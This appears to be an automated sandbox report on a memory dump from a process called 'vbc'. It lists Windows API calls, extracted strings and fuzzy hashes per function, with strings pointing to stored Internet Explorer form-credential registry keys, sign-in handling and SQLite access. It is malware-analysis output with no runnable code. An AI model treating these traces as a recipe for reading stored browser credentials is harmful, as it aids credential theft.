                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                        • String ID: %s (%s)$TK@
                                                                                                                                                                        • API String ID: 3979103747-3557169880
                                                                                                                                                                        • Opcode ID: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
                                                                                                                                                                        • Instruction ID: e896be4b8b4c8dd321127e9193ea498031fb30aa9e34a4c02f498fe4f9df0790
                                                                                                                                                                        • Opcode Fuzzy Hash: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F2162B2800118ABDF20DF95CC45E8AB7B8FF44318F05846AEA48A7106DB78E618CBD4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000,?,0040FF40,00000000), ref: 00407D1B
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5), ref: 00407D39
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407D46
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00407D56
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000), ref: 00407D60
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00407D70
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                        • API String ID: 2767993716-572158859
                                                                                                                                                                        • Opcode ID: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
                                                                                                                                                                        • Instruction ID: f6f7092b450fef05d0d872bf5e04b1357ca4228fed94eee9f5e7a838667149bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
                                                                                                                                                                        • Instruction Fuzzy Hash: D201F771A041147BFB1527A0EC4AFAF7B6CDF567A1F20003AF506B10D1EA786E00D6AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BCA4
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BCB4
                                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 0040BCC5
                                                                                                                                                                          • Part of subcall function 0040B82A: GetPrivateProfileStringW.KERNEL32 ref: 0040B846
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                        • API String ID: 3176057301-2039793938
                                                                                                                                                                        • Opcode ID: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
                                                                                                                                                                        • Instruction ID: d09d9999bd57a78b58a4055e383115949195630bbf49bad653da3d74dfc2830b
                                                                                                                                                                        • Opcode Fuzzy Hash: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AF0C232EC0A5137EB1137221D03F2A2608CF92B57F15847BB904762D3DA7C4A15D2DE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • cannot ATTACH database within transaction, xrefs: 0042EED9
                                                                                                                                                                        • database is already attached, xrefs: 0042EF94
                                                                                                                                                                        • out of memory, xrefs: 0042F0D8
                                                                                                                                                                        • database %s is already in use, xrefs: 0042EF3B
                                                                                                                                                                        • too many attached databases - max %d, xrefs: 0042EEC3
                                                                                                                                                                        • unable to open database: %s, xrefs: 0042F0C1
                                                                                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042EFE2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                                                                                        • Opcode ID: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
                                                                                                                                                                        • Instruction ID: af9b9ef2f5a1795804296138b741be62980529f77760b3752da5ffa5b8d2aff6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
                                                                                                                                                                        • Instruction Fuzzy Hash: E991E370B00311EFEB10DF66D581BAAB7F0AF44308F94846FE8559B242D778E945CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C37A
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C396
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040C3BB
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040C3CF
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C452
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C45C
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C494
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                          • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                          • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                        • String ID: 8"E$d
                                                                                                                                                                        • API String ID: 1140211610-2418960419
                                                                                                                                                                        • Opcode ID: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
                                                                                                                                                                        • Instruction ID: ebdbfbf94f53a3690cf38ac0907b9363cbed6c4ceb444703d02dc3853126dfb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
                                                                                                                                                                        • Instruction Fuzzy Hash: 3851AE726007049FD724DF29C586B5AB7E4FF48314F10862EE95ADB391DB78E5408B48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004171FA
                                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 00417204
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417216
                                                                                                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004172EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3015003838-0
                                                                                                                                                                        • Opcode ID: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
                                                                                                                                                                        • Instruction ID: b1728a7637de8f6c0c3372c087848d546b31592ea547c84e90bff2a5ea0aeb9c
                                                                                                                                                                        • Opcode Fuzzy Hash: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F41F27550C702AFE7218F20DC01BA7B7F1AB90B14F20496EF59552381DBB9D9C68B1E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E63
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00417E6A
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417E77
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00417E8C
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E95
                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00417E9C
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417EA9
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00417EBE
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 00417EC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2802642348-0
                                                                                                                                                                        • Opcode ID: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
                                                                                                                                                                        • Instruction ID: 47bfd0c0f8263ce6d61c00ded009a165ca5b61f2fc3d609cfbcfb361f1c4a64c
                                                                                                                                                                        • Opcode Fuzzy Hash: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
                                                                                                                                                                        • Instruction Fuzzy Hash: 1711063D5087149FCA2027706CC86BF36F49B57772B2102AAF953922D1DB2D4CC1956D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                                                                                        • Opcode ID: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
                                                                                                                                                                        • Instruction ID: 1058aa724a71ea66541b56df80d5a3cdc90ec5801de880f61679d0e38116f1b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2901927AE542A1A5F63031094C86FF74198DBE3B15FB14127FA96252C5E28D49C382AF
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                          • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                          • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                          • Part of subcall function 00408EE8: free.MSVCRT(?,00000000,?,0040923F,00000000,?,00000000), ref: 00408EF7
                                                                                                                                                                        • memset.MSVCRT ref: 0040A5DF
                                                                                                                                                                        • RegEnumValueW.ADVAPI32 ref: 0040A60D
                                                                                                                                                                        • _wcsupr.MSVCRT ref: 0040A627
                                                                                                                                                                          • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                          • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                          • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                          • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                        • memset.MSVCRT ref: 0040A676
                                                                                                                                                                        • RegEnumValueW.ADVAPI32 ref: 0040A6A1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040A6AE
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A58C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                                                        • API String ID: 4131475296-680441574
                                                                                                                                                                        • Opcode ID: 4844c8675b145070dad572f60e49686fb6ff8cc7004fd1c20b8f23b22dadcfc4
                                                                                                                                                                        • Instruction ID: 4ff845341dcd1a768bfc42e85b7312ef223b671260cd3b9f040e87321517091f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4844c8675b145070dad572f60e49686fb6ff8cc7004fd1c20b8f23b22dadcfc4
                                                                                                                                                                        • Instruction Fuzzy Hash: AB413BB694021DABDB00EF99DC85EEFB7BCAF58304F10417AB504F2191DB789B458BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B7F3: memset.MSVCRT ref: 0040B806
                                                                                                                                                                          • Part of subcall function 0040B7F3: _itow.MSVCRT ref: 0040B814
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B299
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                        • String ID: strings
                                                                                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                                                                                        • Opcode ID: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
                                                                                                                                                                        • Instruction ID: c57a50961ac065af18f7b97b0dfcf96f0970c66ac6ac5239858a4cd79fa145fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 35415975200701BBDB259F14FC9593A3365E784387B20453EE802A73A3DB39EA16DB9C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                        • String ID: sysdatetimepick32
                                                                                                                                                                        • API String ID: 1028950076-4169760276
                                                                                                                                                                        • Opcode ID: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
                                                                                                                                                                        • Instruction ID: cf2ea30055fd2b250d8a38ac5c403ff02bed82fd0d2b8d5d11e07c443477a94e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
                                                                                                                                                                        • Instruction Fuzzy Hash: D31177325002197BEB20EB91DC8AEEF777CEF45750F404066F509E1192EB749A41CB99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
• Instruction ID: 74a332e22f0b607a266e47b82b9d8ba1ef45136a3b8be849caa08d0d2b66e2c9
• Opcode Fuzzy Hash: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
• Instruction Fuzzy Hash: DCA1C071A0464AEFDB14DF64C8417DEBBB0FF04314F14826EE46997381D738AAA4CB98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00405153
• GetDlgItem.USER32 ref: 00405166
• GetDlgItem.USER32 ref: 0040517B
• GetDlgItem.USER32 ref: 00405193
• EndDialog.USER32(?,00000002), ref: 004051AF
• EndDialog.USER32(?,00000001), ref: 004051C4
  • Part of subcall function 00404E6E: GetDlgItem.USER32 ref: 00404E7B
  • Part of subcall function 00404E6E: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E90
• SendDlgItemMessageW.USER32 ref: 004051DC
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004052ED
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
• Opcode ID: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
• Instruction ID: 2cde12ba5927d4bde9809f16a4ff1e8400ea1fd37873b15a8c1cc8d9e94e8744
• Opcode Fuzzy Hash: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
• Instruction Fuzzy Hash: 6961B030600B05ABDB31AF25CC86B6B73A5FF50324F00863EF515AA6D1D778A951CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00443F6F
• _wcsicmp.MSVCRT ref: 00443F84
• _wcsicmp.MSVCRT ref: 00443F99
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
  • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
• Opcode ID: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
• Instruction ID: 597a29036d5ddd155e475e5b18437da6987c3908216f6d337c400390a4fd9aac
• Opcode Fuzzy Hash: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
• Instruction Fuzzy Hash: A54135758087018AF7309EA5D94076773D8DB84B26F208D3FE56AE36C1EEBCE958411E
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
• Instruction ID: 5d7335f69ca4f594208563f7014043d8df0e1bea6ea55c180c5050c90dc7a29e
• Opcode Fuzzy Hash: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
• Instruction Fuzzy Hash: E931A4B1500A01AFEB14AF69C98691AB7A4FF04354710453FF545E7691DB78EC90CF98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32 ref: 00405491
• GetWindow.USER32(?,00000005), ref: 004054A9
• GetWindow.USER32(00000000), ref: 004054AC
  • Part of subcall function 00401735: GetWindowRect.USER32 ref: 00401744
• GetWindow.USER32(00000000,00000002), ref: 004054B8
• GetDlgItem.USER32 ref: 004054CE
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040550D
• GetDlgItem.USER32 ref: 00405517
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405566
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
• Opcode ID: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
• Instruction ID: ee080d675ccdbf70b04d6128f25a7e8090f7ef981af0433368dbc7d1a9e2eb74
• Opcode Fuzzy Hash: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
• Instruction Fuzzy Hash: AB218071690B0977EA0137229D86F6B366DEF96714F10003AFA007B2C2EEBA580245AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F3A
• wcslen.MSVCRT ref: 00407F47
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040F25C,-00000210), ref: 00407F57
• GlobalLock.KERNEL32 ref: 00407F64
• memcpy.MSVCRT ref: 00407F6D
• GlobalUnlock.KERNEL32(00000000), ref: 00407F76
• SetClipboardData.USER32(0000000D,00000000), ref: 00407F7F
• CloseClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F8F
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
• Instruction ID: 8669bfd28652b36aabcc6f95cbac9fd564b8d5c2b1f3dd921f492192fb7780cb
• Opcode Fuzzy Hash: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
• Instruction Fuzzy Hash: E8F0E03B600A157FD6103BF0BC4CF5B776CDBC6B96B01013AF905D6252DE68580487B9
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406FF4
• memset.MSVCRT ref: 00407008
• strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
• strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
• strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
• strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
• wcscpy.MSVCRT ref: 0040709D
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy$ByteCharMultiWidememset$wcscpy
• String ID:
• API String ID: 4248099071-0
• Opcode ID: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
• Instruction ID: 3602a3695f0633691502e701aaeaa3678f077821d3d25540d64766a890a16dc7
• Opcode Fuzzy Hash: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
